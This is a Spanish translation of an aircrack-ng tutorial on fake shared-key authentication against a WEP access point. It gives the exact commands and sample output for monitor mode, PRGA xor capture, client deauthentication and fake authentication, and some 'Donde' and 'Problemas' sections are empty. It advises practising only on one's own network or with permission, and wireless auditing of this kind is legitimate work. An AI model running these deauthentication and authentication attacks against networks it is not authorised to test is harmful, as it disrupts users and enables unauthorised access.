Table of Contents

Tutorial: Como hacer una autenticación falsa con clave compartida (shared key)

Version: 1.06 Junio 25, 2007
By: darkAudax
Traducción: 20 de Julio de 2007
Archivo utilizado en este tutorial: wep.shared.key.authentication.cap

Introducción

Este tutorial sirve para la situación en la que recibes el siguiente mensaje de error cuando intentas realizar una falsa autenticación con aireplay-ng:

 15:46:53  Sending Authentication Request
 15:46:53  AP rejects open-system authentication
 Please specify a PRGA-file (-y).

El tutorial se basará en la autenticación WEP por lo que es necesario entender lo que estamos haciendo. Despues explicaremos las técnicas y los métodos de forma detallada.

Es recomendable que experimentes con tu propio punto de acceso para familiarizarte con estas ideas y técniceas. Si no es de tu propiedad, recuerda que debes pedir permiso al dueño del punto de acceso con el que quieras practicar o jugat.

Antes de nada quiero darle las gracias al Équipo de Aircrack-ng por desarrollar y mejorar esta suite tan fantástica.

Por favor, enviame cualquier duda o sugerencia, positiva o negativa. Los problemas que encuentres, ideas o trucos serán bienvenidos.

Puntos de partida

Esta solución presupone que:

Asegurate de que cumples todas las condiciones, sino aunque sigas las instrucciones no te funcionará. En los siguientes ejemplos, tendrás que cambiar “ath0” por el nombre de la interface de tu tarjeta wireless. La opción “doble guión bssid” se muestra como “- -bssid”. Acuérdate de borrar el espacio entre los dos guiones cuando lo escribas.

Equipo usado

En este tutorial:

Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos.

Solución

Antecedentes

Un punto de acceso tiene que autenticar al cliente antes de que pueda asociarse con el punto de acceso o entrar en la red. El estandar IEEE 802.11 define dos modos de autenticación WEP: Abierta (Open System) y compartida (Shared Key).

Nosotros tenemos que “pelear” con la autenticación usando una clave compartida. Netgear tiene un diagrama muy bueno en esta página. Por favor, echale un vistazo para que entiendas en que consiste la autenticación con clave compartida (shared key authentication) y como funciona.

Contenidos

Para conseguir hacer una autenticación falsa con clave compartida, necesitamos un archivo PRGA (pseudo random generation algorithm) xor. Desarrollaremos los pasos detallados para conseguir esto. Seguidamente usaremos el archive PRGA xor para hacer una falsa autenticación.

Aquí estań los pasos que vamos a seguir:

  1. Colocar la interface wireless en modo monitor y especificar el canal del AP
  2. Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el archivo PRGA xor
  3. Deautentificar a un cliente conectado
  4. Realizar una autenticación falsa con clave compartida “shared key”

Paso 1 - Colocar la interface wireless en modo monitor y especificar el canal del AP

Escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

airmon-ng start wifi0 9

Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old.

El sistema nos responderá:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Puedes observar que “ath0” aparece colocada en modo monitor.

Escribe “ifconfig ath0 up” para levantar la interface ath0 que usaremos a continuación.

Para confirmar que la interface está bien configurada, escribimos “iwconfig”.

El sistema nos responderá:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
           Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:09:5B:EC:EE:F2   
           Bit Rate:0 kb/s   Tx-Power:15 dBm   Sensitivity=0/3  
           Retry:off   RTS thr:off   Fragment thr:off
           Encryption key:off
           Power Management:off
           Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará.

Para ver la correspondencia entre frecuencia y canal, mira: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . Así obtendrás la frecuencia para cada canal.

Problemas

Paso 2 - Iniciar airodump-ng

Abre una consola para capturar el archivo PRGA xor. Y escribe:

airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w sharedkey ath0

Donde:

Pero, ¿cómo determinamos si la autenticación con clave compartida está activa?. Además de con el mensaje de error mostrado en la introducción; en la siguiente captura de pantalla puedes ver las letras “PSK” en la columna CIPHER. Esto significa que el AP está usando autenticación con clave compartida. Pero esto no aparecerá y por tanto no tendremos esta información hasta que un cliente se asocie correctamente al AP.

  CH  9 ][ Elapsed: 20 s ][ 2007-02-10 16:29 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   37 100      197        0    0   9  11  WEP  WEP    PSK  teddy                            
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:34:30:30   61     0        4       

Una vez que aparece “PSK” en la ventana de airodump-ng, si ves la lista de los archivos que tienes guardados verás algo como esto: sharedkey-01-00-14-6C-7E-40-80.xor sharedkey-01.cap sharedkey-01.txt

El archivo “sharedkey-01-00-14-6C-7E-40-80.xor” contiene el PRGA xor que usaremos más adelante para completer la falsa autenticación de forma satisfactoria. El siguiente archivo de ejemplo: wep.shared key authentication file lo puedes ver con WireShark y analizar la forma que tiene el paquete. Puedes compararlo con tus capturas para ver si estás perdiendo algún paquete.

Puede que tu no tengas tanta suerte y que a pesar de estar snifando tráfico cuando un cliente se asocia al AP y produce el PRGA xor; no consigas capturarlo al primer intento. Para obtener el archivo con el bit PRGA, hay dos métodos:

Paso 3 - Deautentificar a un cliente conectado

Este paso solo es requerido si aun no tenemos el archivo PRGA xor. Tambien podemos usar el archivo PRGA xor obtenido a través de un ataque chopchop o de fragmentación.

A través de la salida de airodump-ng del paso anterior, puedes determinar cual es el cliente que está actualmente conectado. Necesitaremos la dirección MAC para ejecutar el siguiente comando:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Donde:

Esta es la salida de este comando:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Antes de ejecutar el commando recien explicado, abre otra shell y ejecuta airodump-ng de la misma forma que lo hicimos con anterioridad: “airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w sharedkey ath0”.

Cuando ejecutes el comando de deautenticacion, mira en airodump-ng si has obtenido el PRGA xor. Si aun no lo has conseguido, prueba a realizar otra deautenticacion o prueba a realizarla contra otro cliente diferente.

Una vez que has obtenido el archivo PRGA xor, continua con el siguiente apartado.

Problemas

Paso 4 - Realizar una autenticación falsa con clave compartida

Ahora que ya tienes un archivo PRGA xor, estás preparado para hacer la autenticación falsa:

aireplay-ng -1 0 -e teddy -y sharedkey-04-00-14-6C-7E-40-80.xor -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Donde:

Un ejemplo de una autenticación exitosa (successful) sería:

 11:44:55  Sending Authentication Request
 11:44:55  AP rejects open-system authentication
 Part1: Authentication
 Code 0 - Authentication SUCCESSFUL :)
 Part2: Association
 Code 0 - Association SUCCESSFUL :)

Si recibes este mensaje, puedes continuar con las técnicas de inyección clásicas.

Ahora ponemos un ejemplo de un fallo de autenticación:

 11:45:06  Sending Authentication Request
 11:45:06  AP rejects open-system authentication
 Part1: Authentication
 Authentication failed!
 Part1: Authentication
 Authentication failed!
 etc...

Por último otro tipo de fallo:

 11:55:05  Sending Authentication Request
 11:55:05  AP rejects open-system authentication
 Part1: Authentication
 Code 0 - Authentication SUCCESSFUL :)
 Part2: Association
 Not answering...(Step3)
 Retrying association sequence!
 Part2: Association
 Not answering...(Step3)
 Retrying association sequence!
 etc...

Aviso

Problemas